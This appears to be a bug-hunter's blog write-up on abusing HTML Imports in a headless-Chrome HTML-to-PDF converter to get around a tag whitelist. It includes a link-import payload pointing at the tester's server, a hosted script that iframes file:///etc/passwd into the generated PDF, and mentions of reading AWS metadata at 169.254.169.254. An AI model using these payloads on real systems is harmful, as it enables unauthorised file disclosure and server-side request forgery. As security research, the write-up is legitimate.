Intro

You’ve probably already heard about many different ways to exploit HTML-to-PDF converters and access sensitive info: you can try to <iframe> AWS’s 169.254.169.254 IP and read that sweet, sweet metadata. Didn’t work? Inject a <script> tag and use JavaScript. Filtered, too? Maybe try a <link> with a rel="attachment" property and attach a sensitive file to the PDF. No? At least use an <img> to send GET requests to internal hosts or fingerprint them using their favicons?

Recently, I ran into a scenario where all of these HTML tags were correctly filtered, and none of the methods/bypasses/encodings I tried seemed to work.

How the App Worked

The feature I was testing was some kind of contact form. You could customize the look and feel of your form using a rich text editor and when your form gets a response, you can download it as a PDF. After looking at the app a bit more in-depth, I noticed a few things:

  • The text editor uses HTML to format text, embed images, etc. But there is a whitelist allowing only a few innocuous HTML tags.
  • <img> is one of the allowed tags, so I used it to send a request to my collaborator server and fingerprint the converter based on the User-Agent header. It was headless Chrome.
  • You can attach arbitrary properties to whitelisted HTML tags as long as the properties aren’t JS event handlers, i.e. starting with “on” like onload. So <img onload> isn’t allowed, but <img whatever> is.
  • One of the allowed HTML tags is <link> which is used for styling purposes.

I set up an HTTP server and used HTTPLeaks to determine if any of the allowed HTML tags could be used to do anything interesting. One of the few vectors that triggered an HTTP request was <link rel="import" href="https://leaking.via/link-import"/>, aka HTML Imports.

HTML Imports 101

According to the W3 draft, “HTML Imports are HTML documents that are linked as external resources from another HTML document”. It’s a relatively new HTML feature that was created to allow developers to bundle HTML/JS/CSS resources into a single file. From a security perspective, one of the most interesting features of HTML Imports is that an import can execute JavaScript code and access the DOM of the page that’s importing it.

HTML imports can be defined using the following syntax

<link rel="import" href="/import.html">

It’s important to note that as of 2021, the HTML imports feature has been deprecated and removed from Chrome, so this technique only works on Chrome versions before 80.

Exploitation

You’ve probably guessed where this is going. The most straightforward way to exploit an HTML-to-PDF converter is using an <iframe>, and if it’s filtered, we can use a <script> and create the iframe using JavaScript. What if <script> and all the other methods of executing JavaScript are also filtered? Use a seemingly innocent <link> tag to import an HTML file that runs your JavaScript code.

The payload looked like this

<link rel="import" href="http://[my_server]/import.html">

And on my server, I enabled CORS hosted a payload that created an <iframe> with the content of /etc/passwd

<script>
  var iframe = document.createElement('iframe');
  iframe.height = 1000
  iframe.width = 1000
  iframe.src="file:///etc/passwd";

  document.body.appendChild(iframe)
</script>
Note: document here references the main document that’s importing the file. To access the the import document itself, you can use document.currentScript.ownerDocument

To test this locally, you can install Chrome v80>= and use this command to generate a PDF

google-chrome-stable --headless --print-to-pdf import.html

Conclusion

It’s useful to read RFCs and research the technologies that you’re trying to break. Usually, you will find interesting behavior that may help you find more exploits and bypasses. Although the HTML Imports feature has been deprecated in newer versions of Chrome, it might come in handy; the older versions are still used in the wild.